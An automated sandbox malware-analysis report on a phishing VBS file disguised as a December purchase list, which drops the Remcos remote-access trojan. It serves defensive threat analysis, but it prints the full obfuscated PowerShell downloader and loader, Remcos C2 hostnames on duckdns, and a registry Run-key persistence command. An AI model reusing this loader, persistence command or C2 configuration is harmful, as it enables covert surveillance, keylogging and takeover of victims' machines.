Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    09-12-2024 20:33

General

  • Target

    Rfq_po_december_purchase_list_details_specifications_09_12_2024_0000000000.vbs

  • Size

    34KB

  • MD5

    429fa2fac12973a50fbd8e41998e6c8b

  • SHA1

    774c2fe5f115156eefd125497da2e14f4e4ae001

  • SHA256

    457b79bd32d44957c1e9608f1ff2d2b5a38244beb2c1234356b568c5a3cd5f9a

  • SHA512

    65324b5653bf5e255b029e296cfc78f4fa07757adfa0b09d50ff12d7b70cd68980bfb88ebc916cf480c656132193ac84061ee393b0ae11f1e25a1635ab21367e

  • SSDEEP

    384:y4TN2uK4JSWDatgGQjwFzpOHCAxQzkmXXM3veQ:zTN2uK4JxDatgbjwFp6zxW+mQ

Malware Config

Extracted

Family

remcos

Botnet

Valdo

C2

janout21oadsts1.duckdns.org:57484

janout21oadsts1.duckdns.org:57483

janout21oadsts2.duckdns.org:57484

janout21oadsts3.duckdns.org:57484

janout21oadsts4.duckdns.org:57484

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    amaonspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    lmoijuetgtso-Y2NXRF

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rfq_po_december_purchase_list_details_specifications_09_12_2024_0000000000.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$togue='Ornithodelphian';;$Shoat='Atomekspert';;$Photoduplication='Anthropolatric';;$Sovser='Syllabation';;$Hued=$host.Name;function Seismologis84($Erstatningsforslagenes){If ($Hued) {$kedsommeligst=5} for ($Plusher=$kedsommeligst;;$Plusher+=6){if(!$Erstatningsforslagenes[$Plusher]){$Flingens++;break }$Asbesten+=$Erstatningsforslagenes[$Plusher];$Fineret='Aare'}$Asbesten}function Outprayed($Rottedes){ .($Marlacious) ($Rottedes)}$Formularernes=Seismologis84 'C rymNTaiasEEdaphT Sunt.foru W';$Formularernes+=Seismologis84 'GracieSedatBEriopc andL BarnIPl muESar anAfstbT';$Computernrden=Seismologis84 'OvermMPri eoForb zLumini redblSpir.l bstia Spal/';$Bryggekedelen=Seismologis84 'Neg tTTranslStransSitua1Brick2';$Epidia='Recar[ MillNGazooeTabelT.orfo. TottsFabriE.roderCryosvL.endIUrbanC dangERe roP ,nteOCon.eiIndprN Fo htKomm,mRessoA Persn Bansa tedbgPrioreAggreRsyria]Udlos:Ufors: TeatS fteEImpulCHusfauTagryRMod riI swiT Termy KollPtipvorPackeOMartiTFeterOWayl,CSpinaoskrteLPersp=bes a$PresuBUdtydRKvaliyStyltgSu trGSwamiEMorsokFilsyeMantedFla oECo polEmbedEdefilN';$Computernrden+=Seismologis84 ' Flyv5 Kont.Abule0Aarsu Unfr,(UncomWNabogiStatunAppeldSklskoDetacwUndersAadse FabrNAlpheTNacke Circ,1Datas0Air,a.Hjrne0A.unc;Preis ArbejW ,orsiOffernPrefe6Tresk4Gensk; Sh r Ef ekxHusfl6Af,en4D urb;Mysel Li,otrForthvBabir:Stran1Sange3Virg 1 F,nk.I dtg0Domsp)Trans DestaG Unc.eO varcForlakSmello Con /Hypoz2Sligh0Fugle1 Ex.l0Oscul0Symp 1Krig 0 Cano1Assum Ove,FLneuniBegitr PiraeLaps,fCoquioSkippx,ceto/Op,as1anima3 Brev1Bista. Inte0';$Argest135=Seismologis84 'RudelUInvitsBumpseFu.dtrGara -AkelaA Ins.gMar uELog,knNyt et';$Pagajernes=Seismologis84 'RentehDeit,tCom,it kovbpV.ldtsMarty:T pem/Bisag/ NdvesLea.eu redipHoldaa Ud bmAdriaaKv,ltn FlletTelegeAssyrx Ak i.D aphcko suoDimetm Pros/ .ranFSkrbulPri,kaPreouthesteb MaterBaadeoForredJourn.AngoraHymena RaymfNikol>fyldeh HosptAfs,atGastrp Das ssi na:Coc,s/Fauxl/LieposUdtoluSkulephjerta AnsamSchtiaSk mrnArbejtRetrae F rdxD.modb imincfri.uk Misau rutep iasp.Na nkc VapooB.tikm Epit/SkovkFLuminlKarr aUn,qutPoll.bVic ar.hairoForbrdOverl.ModlyaMotopaSensaf';$Driftssikkerer=Seismologis84 'Faen >';$Marlacious=Seismologis84 'UncaliSkakbeNulstx';$Uretmssigheden='Poppylike';$Afsvkningernes='\Spermoderm88.For';Outprayed (Seismologis84 'Symme$,prgeg FradlnerveOriggabTelchATr.nsL Tuss: BdepuLadt,NRotorP AbeloRo usUDes,enUnadmCKymriE FodedUnhyd=Herni$RectoE ,abyNBloklV C ro:omgruaDisidp IndkpOverbd StipAHo,pit TeksADefin+Rekti$Hert,aFikieFFiskesTvredv ,mklkHarannHjemmiSpacenThirsG NonpEBibliR agerNUnstreDomsts');Outprayed (Seismologis84 'Kreti$Integg alpelUoverO undeBEuryhaGymn lLytts:SlangBForesAD.pill elseeRaaklNAugurCVrdikIIr ecaCa,fdGBibliaauten=Krydd$IncapPFl.tbaS.miaGBehf A DrotJU exiELorinrH lafNAflivePolioSPo.te.Und,rSIndfrpTrilllan ndiMarquTAntir(Meta.$H,mopdCountr Pe,mIJapanfPreobtGymnaSthornsBacksiPeckskTvtteKRev.leFormurTheo EMea.wRDu ke)');Outprayed (Seismologis84 $Epidia);$Pagajernes=$Balenciaga[0];$Dybsindets=(Seismologis84 ' .imi$OllebgSyvtaLOwns,OFenagBVodena JaggL .efu:F ankoOctylbSkovrt EulaeFlypasLeksitDgnsmaB gsttProteITraadoBenn NTeleu=FortunJagt eT,oskw erli-sprogOImpurB DisjJ CimmEResp,CIndistHarke Kale SDesaryBloods Hyp tLrdagEIrlinMBroke. orde$ Bag.fSmerto CistrHyperMAttraUMetalLEleemACanalrGluteeGttenrDerienArtieeGradnS');Outprayed ($Dybsindets);Outprayed (Seismologis84 ' Quoi$Fim eO Rum bSolidt JerreFutursHove tforsba ,hlotApproiResunoSejlbnPr ar. He tHWestbeSeve.a SalvdGlos e ForerBedrasPlasm[Boble$F lkoArevisrIrgengOm kre ReslsAfsvotLip e1 Soko3Bag t5pr em] cham= Kl,t$ApostC plaso Oscim camppAmygdu PodatAdelseHockerInte nCytoprNonsidWenz e Ri.sn');$Samovarerne=Seismologis84 ' Ci,a$RefraO,rhvebU,rigtPhytoeBitsysUn,obtBo reaFa actKalori Lan oAcantn Magn. SaurDPersooRavnewTorn.nGlif lHoedeoB folaOvermdGraadFKnitbiSkomal Sk ee Galo( Turb$ f igPLimetaDommegUgennaHyperjEst,reTwilirudaannS.xoneSupers Unin,Trach$ Ha raVagtmrHexadrHistoa Rotun mtssgAffole Ovarr OptiiHumorn S,aagScrageUmbelrForcenCribbePoser)';$arrangeringerne=$Unpounced;Outprayed (Seismologis84 ' Edge$Klubhg UneqlVandboChlambSpasmani htlLrebo: Korel BestoPalaeGgormpi .dmtCeftera .rykl Is,cIAbessSSnkereTurkesAppel=Desti(Agitat LoosESatyaSBrissT S,ab- Sk,lP J.wsAAnti,TPercoHNonte Ga ga$BrnefARev erEnso rHenfaAGl ptnkabarg ResmeEksprREjendiPrivanBronzGM.gameUnshrr DeskNTeaktE S lv)');while (!$Logicalises) {Outprayed (Seismologis84 'Evolu$munkegUnflulH drroGenneb Vaa a Ch ilBadst:SinusRbraxiaTerr.v.upenaParabgfunkteI denrAquacs Unde=Ekspo$CanesK.dereaDeci t kuplaAdverlIn.spo UnligAutoisMani tNitrorToilluGristk SynctbrugeuGurglrPr jee SoverUdsti1Scrub5 Onto3') ;Outprayed $Samovarerne;Outprayed (Seismologis84 ' Dou.sIn ifTSke pA TabgrPrsenTJuven-blodlsStmagLslideEErstae.orepPDahli Polar4');Outprayed (Seismologis84 'Radia$undenGMinerlUlovlOHygeib arbeaAnemolN,dlg: MeaglAfpreohernaGPhotoIPassac rriaRegral RemoINeutrSHereaEsalgeSBrand=Multi( umanT To ceVrdigsBord tMi,ro-ChichpbunnsAT yghTCoum,HBorer .orls$SkindAFak uR ominrUddelaPolitnEnsurGBulliEHalosrGstfrITetr n SommGT orie AmerRFa erNNitroE lat)') ;Outprayed (Seismologis84 'Autod$EntomgThorilR nchotele BB ystAHeterLInqui:Galanj V enEHelbrrMerveA,iddemArmipeKautiyReesh=Feath$ esuiGUnderLDisabo Ind BOnderaPlag LDread:Smu sTL stovRekorARangdnEffekGMi,ers JebliSkov.n P lvdDinapL N chGOrnitGStatuEDisansRam.e+Sporv+Blade%gro l$K eosBHn.ikaH vanL ardieFlersnReligcJ.viaIEp seaForsygSwingAImita.KlootCSlabboPatenUParotn udsat') ;$Pagajernes=$Balenciaga[$jeramey]}$Embeam=300252;$hydrophid=31283;Outprayed (Seismologis84 'Acces$Redung Sn.rl ChamoEnrolbKnippaPseudlAntis: varicSupe.N Henli SelvdUvulaaka se Peaco=Sapid ampeGUnderEOsiritEncas-ExtorcSekunO.barnN ValmT DmonE ColtnSee iTUdrm Mojo$K,ttlaLippyr xterRmagn,A NorgN paasgEjende Saftr FortI nsphNpandagUnbrieMar or NettNDevote');Outprayed (Seismologis84 ' Tyto$I.fragKandilValgfoL,owibRubyia Fo elSkalp:SlyngP ningoSyntheSk ndc KonchdisenoSkaftrHell eReunisslu.s Elep = Teks Pla.h[RejfeSFastfyT iolsO.nortSektie.alvemMaril.cerveCMe.apoKamelnAure vPaabeeTitmarundert Un e]U ion:Un.hi:SquamFstillrUpaakoridefm BejdBAdopta S,orsLin.eeSkrmf6A.akr4Co ntSFrednt Tox rAsiatiJag bnPelagg Figw(St rt$NominCNonvanPommeiacclidM delaReneg)');Outprayed (Seismologis84 ' S.am$ Za bG SmgeLAf igo DistbMor.iaBlaewLCor,n:Kryptf brusLOmodyuGi,lin TraaKBues Y ,erviBan bST.erstF licIPle uCsrdel C ove=Trite Fril,[Sk.vlsIcho YStaldSCacomTSpra ECleanM.ighl.D,smotNan pEOvolyX rediTSensi.AnstreForbiNLydteC HersoAn,imDMarkei PaadnFilisG hor.]Apost:Vi.dr:HiemaA ngesBandec,outhISkudrIlangs.,papigBa amENonheTFormasArkettSmudsrUntriis.eneN ,ongG hamp(Prere$ RytmP NonfoJ nkrEforsyCOverdHMaizeoBlodtrTorsiEPrepuSHeeze)');Outprayed (Seismologis84 'twis $MiltigOpforL Po.aOEumenbRustiASa,tblBrn l:agnesNTelesuT aceTBrugegCyc,sAVivisL BoulL rchi1Vandl8Synar0Bytte=Money$Syzygfs rhul VerguUnexanWood kAnt,sYElecti S alSTablet A grIHalvfCRetfr. gladsP oduU Bh.rBGlossSDoubtTHalv,Rkrau IForviNTabasGStumf(Splan$UnnereudestMKropsB FornE Fad.aFi,taM erve,Gnot $ UnraHFuselYWea.id Quonrfa keoStelap ajseH virliEpos dLakse)');Outprayed $Nutgall180;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:848
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$togue='Ornithodelphian';;$Shoat='Atomekspert';;$Photoduplication='Anthropolatric';;$Sovser='Syllabation';;$Hued=$host.Name;function Seismologis84($Erstatningsforslagenes){If ($Hued) {$kedsommeligst=5} for ($Plusher=$kedsommeligst;;$Plusher+=6){if(!$Erstatningsforslagenes[$Plusher]){$Flingens++;break }$Asbesten+=$Erstatningsforslagenes[$Plusher];$Fineret='Aare'}$Asbesten}function Outprayed($Rottedes){ .($Marlacious) ($Rottedes)}$Formularernes=Seismologis84 'C rymNTaiasEEdaphT Sunt.foru W';$Formularernes+=Seismologis84 'GracieSedatBEriopc andL BarnIPl muESar anAfstbT';$Computernrden=Seismologis84 'OvermMPri eoForb zLumini redblSpir.l bstia Spal/';$Bryggekedelen=Seismologis84 'Neg tTTranslStransSitua1Brick2';$Epidia='Recar[ MillNGazooeTabelT.orfo. TottsFabriE.roderCryosvL.endIUrbanC dangERe roP ,nteOCon.eiIndprN Fo htKomm,mRessoA Persn Bansa tedbgPrioreAggreRsyria]Udlos:Ufors: TeatS fteEImpulCHusfauTagryRMod riI swiT Termy KollPtipvorPackeOMartiTFeterOWayl,CSpinaoskrteLPersp=bes a$PresuBUdtydRKvaliyStyltgSu trGSwamiEMorsokFilsyeMantedFla oECo polEmbedEdefilN';$Computernrden+=Seismologis84 ' Flyv5 Kont.Abule0Aarsu Unfr,(UncomWNabogiStatunAppeldSklskoDetacwUndersAadse FabrNAlpheTNacke Circ,1Datas0Air,a.Hjrne0A.unc;Preis ArbejW ,orsiOffernPrefe6Tresk4Gensk; Sh r Ef ekxHusfl6Af,en4D urb;Mysel Li,otrForthvBabir:Stran1Sange3Virg 1 F,nk.I dtg0Domsp)Trans DestaG Unc.eO varcForlakSmello Con /Hypoz2Sligh0Fugle1 Ex.l0Oscul0Symp 1Krig 0 Cano1Assum Ove,FLneuniBegitr PiraeLaps,fCoquioSkippx,ceto/Op,as1anima3 Brev1Bista. Inte0';$Argest135=Seismologis84 'RudelUInvitsBumpseFu.dtrGara -AkelaA Ins.gMar uELog,knNyt et';$Pagajernes=Seismologis84 'RentehDeit,tCom,it kovbpV.ldtsMarty:T pem/Bisag/ NdvesLea.eu redipHoldaa Ud bmAdriaaKv,ltn FlletTelegeAssyrx Ak i.D aphcko suoDimetm Pros/ .ranFSkrbulPri,kaPreouthesteb MaterBaadeoForredJourn.AngoraHymena RaymfNikol>fyldeh HosptAfs,atGastrp Das ssi na:Coc,s/Fauxl/LieposUdtoluSkulephjerta AnsamSchtiaSk mrnArbejtRetrae F rdxD.modb imincfri.uk Misau rutep iasp.Na nkc VapooB.tikm Epit/SkovkFLuminlKarr aUn,qutPoll.bVic ar.hairoForbrdOverl.ModlyaMotopaSensaf';$Driftssikkerer=Seismologis84 'Faen >';$Marlacious=Seismologis84 'UncaliSkakbeNulstx';$Uretmssigheden='Poppylike';$Afsvkningernes='\Spermoderm88.For';Outprayed (Seismologis84 'Symme$,prgeg FradlnerveOriggabTelchATr.nsL Tuss: BdepuLadt,NRotorP AbeloRo usUDes,enUnadmCKymriE FodedUnhyd=Herni$RectoE ,abyNBloklV C ro:omgruaDisidp IndkpOverbd StipAHo,pit TeksADefin+Rekti$Hert,aFikieFFiskesTvredv ,mklkHarannHjemmiSpacenThirsG NonpEBibliR agerNUnstreDomsts');Outprayed (Seismologis84 'Kreti$Integg alpelUoverO undeBEuryhaGymn lLytts:SlangBForesAD.pill elseeRaaklNAugurCVrdikIIr ecaCa,fdGBibliaauten=Krydd$IncapPFl.tbaS.miaGBehf A DrotJU exiELorinrH lafNAflivePolioSPo.te.Und,rSIndfrpTrilllan ndiMarquTAntir(Meta.$H,mopdCountr Pe,mIJapanfPreobtGymnaSthornsBacksiPeckskTvtteKRev.leFormurTheo EMea.wRDu ke)');Outprayed (Seismologis84 $Epidia);$Pagajernes=$Balenciaga[0];$Dybsindets=(Seismologis84 ' .imi$OllebgSyvtaLOwns,OFenagBVodena JaggL .efu:F ankoOctylbSkovrt EulaeFlypasLeksitDgnsmaB gsttProteITraadoBenn NTeleu=FortunJagt eT,oskw erli-sprogOImpurB DisjJ CimmEResp,CIndistHarke Kale SDesaryBloods Hyp tLrdagEIrlinMBroke. orde$ Bag.fSmerto CistrHyperMAttraUMetalLEleemACanalrGluteeGttenrDerienArtieeGradnS');Outprayed ($Dybsindets);Outprayed (Seismologis84 ' Quoi$Fim eO Rum bSolidt JerreFutursHove tforsba ,hlotApproiResunoSejlbnPr ar. He tHWestbeSeve.a SalvdGlos e ForerBedrasPlasm[Boble$F lkoArevisrIrgengOm kre ReslsAfsvotLip e1 Soko3Bag t5pr em] cham= Kl,t$ApostC plaso Oscim camppAmygdu PodatAdelseHockerInte nCytoprNonsidWenz e Ri.sn');$Samovarerne=Seismologis84 ' Ci,a$RefraO,rhvebU,rigtPhytoeBitsysUn,obtBo reaFa actKalori Lan oAcantn Magn. SaurDPersooRavnewTorn.nGlif lHoedeoB folaOvermdGraadFKnitbiSkomal Sk ee Galo( Turb$ f igPLimetaDommegUgennaHyperjEst,reTwilirudaannS.xoneSupers Unin,Trach$ Ha raVagtmrHexadrHistoa Rotun mtssgAffole Ovarr OptiiHumorn S,aagScrageUmbelrForcenCribbePoser)';$arrangeringerne=$Unpounced;Outprayed (Seismologis84 ' Edge$Klubhg UneqlVandboChlambSpasmani htlLrebo: Korel BestoPalaeGgormpi .dmtCeftera .rykl Is,cIAbessSSnkereTurkesAppel=Desti(Agitat LoosESatyaSBrissT S,ab- Sk,lP J.wsAAnti,TPercoHNonte Ga ga$BrnefARev erEnso rHenfaAGl ptnkabarg ResmeEksprREjendiPrivanBronzGM.gameUnshrr DeskNTeaktE S lv)');while (!$Logicalises) {Outprayed (Seismologis84 'Evolu$munkegUnflulH drroGenneb Vaa a Ch ilBadst:SinusRbraxiaTerr.v.upenaParabgfunkteI denrAquacs Unde=Ekspo$CanesK.dereaDeci t kuplaAdverlIn.spo UnligAutoisMani tNitrorToilluGristk SynctbrugeuGurglrPr jee SoverUdsti1Scrub5 Onto3') ;Outprayed $Samovarerne;Outprayed (Seismologis84 ' Dou.sIn ifTSke pA TabgrPrsenTJuven-blodlsStmagLslideEErstae.orepPDahli Polar4');Outprayed (Seismologis84 'Radia$undenGMinerlUlovlOHygeib arbeaAnemolN,dlg: MeaglAfpreohernaGPhotoIPassac rriaRegral RemoINeutrSHereaEsalgeSBrand=Multi( umanT To ceVrdigsBord tMi,ro-ChichpbunnsAT yghTCoum,HBorer .orls$SkindAFak uR ominrUddelaPolitnEnsurGBulliEHalosrGstfrITetr n SommGT orie AmerRFa erNNitroE lat)') ;Outprayed (Seismologis84 'Autod$EntomgThorilR nchotele BB ystAHeterLInqui:Galanj V enEHelbrrMerveA,iddemArmipeKautiyReesh=Feath$ esuiGUnderLDisabo Ind BOnderaPlag LDread:Smu sTL stovRekorARangdnEffekGMi,ers JebliSkov.n P lvdDinapL N chGOrnitGStatuEDisansRam.e+Sporv+Blade%gro l$K eosBHn.ikaH vanL ardieFlersnReligcJ.viaIEp seaForsygSwingAImita.KlootCSlabboPatenUParotn udsat') ;$Pagajernes=$Balenciaga[$jeramey]}$Embeam=300252;$hydrophid=31283;Outprayed (Seismologis84 'Acces$Redung Sn.rl ChamoEnrolbKnippaPseudlAntis: varicSupe.N Henli SelvdUvulaaka se Peaco=Sapid ampeGUnderEOsiritEncas-ExtorcSekunO.barnN ValmT DmonE ColtnSee iTUdrm Mojo$K,ttlaLippyr xterRmagn,A NorgN paasgEjende Saftr FortI nsphNpandagUnbrieMar or NettNDevote');Outprayed (Seismologis84 ' Tyto$I.fragKandilValgfoL,owibRubyia Fo elSkalp:SlyngP ningoSyntheSk ndc KonchdisenoSkaftrHell eReunisslu.s Elep = Teks Pla.h[RejfeSFastfyT iolsO.nortSektie.alvemMaril.cerveCMe.apoKamelnAure vPaabeeTitmarundert Un e]U ion:Un.hi:SquamFstillrUpaakoridefm BejdBAdopta S,orsLin.eeSkrmf6A.akr4Co ntSFrednt Tox rAsiatiJag bnPelagg Figw(St rt$NominCNonvanPommeiacclidM delaReneg)');Outprayed (Seismologis84 ' S.am$ Za bG SmgeLAf igo DistbMor.iaBlaewLCor,n:Kryptf brusLOmodyuGi,lin TraaKBues Y ,erviBan bST.erstF licIPle uCsrdel C ove=Trite Fril,[Sk.vlsIcho YStaldSCacomTSpra ECleanM.ighl.D,smotNan pEOvolyX rediTSensi.AnstreForbiNLydteC HersoAn,imDMarkei PaadnFilisG hor.]Apost:Vi.dr:HiemaA ngesBandec,outhISkudrIlangs.,papigBa amENonheTFormasArkettSmudsrUntriis.eneN ,ongG hamp(Prere$ RytmP NonfoJ nkrEforsyCOverdHMaizeoBlodtrTorsiEPrepuSHeeze)');Outprayed (Seismologis84 'twis $MiltigOpforL Po.aOEumenbRustiASa,tblBrn l:agnesNTelesuT aceTBrugegCyc,sAVivisL BoulL rchi1Vandl8Synar0Bytte=Money$Syzygfs rhul VerguUnexanWood kAnt,sYElecti S alSTablet A grIHalvfCRetfr. gladsP oduU Bh.rBGlossSDoubtTHalv,Rkrau IForviNTabasGStumf(Splan$UnnereudestMKropsB FornE Fad.aFi,taM erve,Gnot $ UnraHFuselYWea.id Quonrfa keoStelap ajseH virliEpos dLakse)');Outprayed $Nutgall180;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2908
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:580
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tvrest" /t REG_EXPAND_SZ /d "%Imitableness% -windowstyle 1 $Medicomoral=(gp -Path 'HKCU:\Software\Confuting\').forretningsbger;%Imitableness% ($Medicomoral)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1412
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tvrest" /t REG_EXPAND_SZ /d "%Imitableness% -windowstyle 1 $Medicomoral=(gp -Path 'HKCU:\Software\Confuting\').forretningsbger;%Imitableness% ($Medicomoral)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2796

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    41a6b4138c0ef68ed983c3d16065ed88

    SHA1

    225b3f1fac6bdb63b36522ba1145a43028db59bc

    SHA256

    328dbd395692551eb798daa31abcef4f24c2678b893926c6756cedc335aa3c9e

    SHA512

    c6169255caff4aa1592a543b84e4161c3d851c6803dce709261bc9ce4e1f629ea5674462766e28ef7cc6873e3fa7120af62d21a7d1bd9ceb5a30c8a13047532d

  • C:\Users\Admin\AppData\Local\Temp\CabA1DD.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar147B.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VC85J5FPJCORUKHIHVKB.temp

    Filesize

    7KB

    MD5

    2b6f7989c7d62a95e14ca6d16377e691

    SHA1

    de06ec3f352868e8e71f661140681c5e30545988

    SHA256

    8da5db73cc76e5ed4c78aaac3df18207b18e82d42a989b66165954f33715e71e

    SHA512

    673aed5f548b18bd3066e005e5b257574dca730b6f425e535245e39e2f3094e7f584417260360900f88371e4c89b33e3e744e19a14646a55300d51d7c39cf3c8

  • C:\Users\Admin\AppData\Roaming\Spermoderm88.For

    Filesize

    431KB

    MD5

    dd6ecd57fb3dec0fd37ee935ef4dde5b

    SHA1

    fa0eb58e9226605555aea72b28f22d66a30b6109

    SHA256

    4c6c1b94d2c27c43fa14202471ab3c04ea0e10bf1c6f16e8843f5b2e4f3768e1

    SHA512

    4852bf46af33f3ee3afb8d715c05ad3371b48da6ed35820ee2f011425678784a60664bd9b5f69066cfd47d09ff9911e5b6d62d425245b95a63c20c77ee77e40e

  • memory/580-52-0x0000000000870000-0x00000000018D2000-memory.dmp

    Filesize

    16.4MB

  • memory/848-23-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

    Filesize

    9.6MB

  • memory/848-26-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

    Filesize

    9.6MB

  • memory/848-28-0x000007FEF5DCE000-0x000007FEF5DCF000-memory.dmp

    Filesize

    4KB

  • memory/848-29-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

    Filesize

    9.6MB

  • memory/848-31-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

    Filesize

    9.6MB

  • memory/848-25-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

    Filesize

    9.6MB

  • memory/848-24-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

    Filesize

    9.6MB

  • memory/848-22-0x0000000001CF0000-0x0000000001CF8000-memory.dmp

    Filesize

    32KB

  • memory/848-21-0x000000001B620000-0x000000001B902000-memory.dmp

    Filesize

    2.9MB

  • memory/848-20-0x000007FEF5DCE000-0x000007FEF5DCF000-memory.dmp

    Filesize

    4KB

  • memory/2908-35-0x0000000006500000-0x0000000008AB5000-memory.dmp

    Filesize

    37.7MB